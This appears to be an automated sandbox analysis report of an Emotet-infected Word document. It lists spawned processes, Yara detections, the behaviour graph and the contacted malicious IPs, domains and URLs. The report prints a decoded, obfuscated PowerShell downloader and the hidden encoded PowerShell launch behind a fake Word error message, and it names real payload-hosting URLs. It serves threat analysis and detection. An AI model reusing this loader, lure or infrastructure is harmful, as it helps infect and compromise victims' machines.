Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004C5A cpuid 7_2_10004C5A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter, 7_2_10007D46
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

Behavior Graph (ID: 337092, Sample: MAIL-0573188.doc, Start date: 07/01/2021, Architecture: WINDOWS, Score: 100)

Summary of the graph: cmd.exe and WINWORD.EXE are started; cmd.exe starts powershell.exe and msg.exe (signatures on cmd.exe: Suspicious powershell command line found, Very long command line found, Encrypted powershell cmdline option found, PowerShell case anomaly found). powershell.exe contacts khanhhoahomnay.net (210.86.239.69, port 80, NETNAM-AS-APNetnamCompanyVN, Viet Nam), veterinariadrpopui.com (209.59.139.39, port 80, LIQUIDWEBUS, United States) and 3 other IPs or domains, then starts rundll32.exe. That rundll32.exe spawns a chain of seven further rundll32.exe instances; six of them trigger "Hides that the sample has been downloaded from the Internet (zone.identifier)", and the last one connects to 5.2.136.90 (port 80, RCS-RDS73-75DrStaicoviciRO, Romania), triggering "System process connects to network (likely due to code injection or exploit)".

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
210.86.239.69 | unknown | Viet Nam | 24173 | NETNAM-AS-APNetnamCompanyVN | true
209.59.139.39 | unknown | United States | 32244 | LIQUIDWEBUS | true
172.67.141.14 | unknown | United States | 13335 | CLOUDFLARENETUS | true
45.130.229.91 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
5.2.136.90 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true
172.67.158.72 | unknown | United States | 13335 | CLOUDFLARENETUS | true

Contacted Domains

Name IP Active
veterinariadrpopui.com 209.59.139.39 true
wpsapk.com 172.67.141.14 true
sofsuite.com 172.67.158.72 true
khanhhoahomnay.net 210.86.239.69 true
shop.elemenslide.com 45.130.229.91 true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://veterinariadrpopui.com/content/5f18Q/ | true | Avira URL Cloud: malware | unknown
http://sofsuite.com/wp-includes/2jm3nIk/ | true | Avira URL Cloud: phishing | unknown
http://khanhhoahomnay.net/wordpress/CGMC/ | true | Avira URL Cloud: malware | unknown
http://shop.elemenslide.com/wp-content/n/ | true | Avira URL Cloud: malware | unknown
http://wpsapk.com/wp-admin/v/ | true | Avira URL Cloud: malware | unknown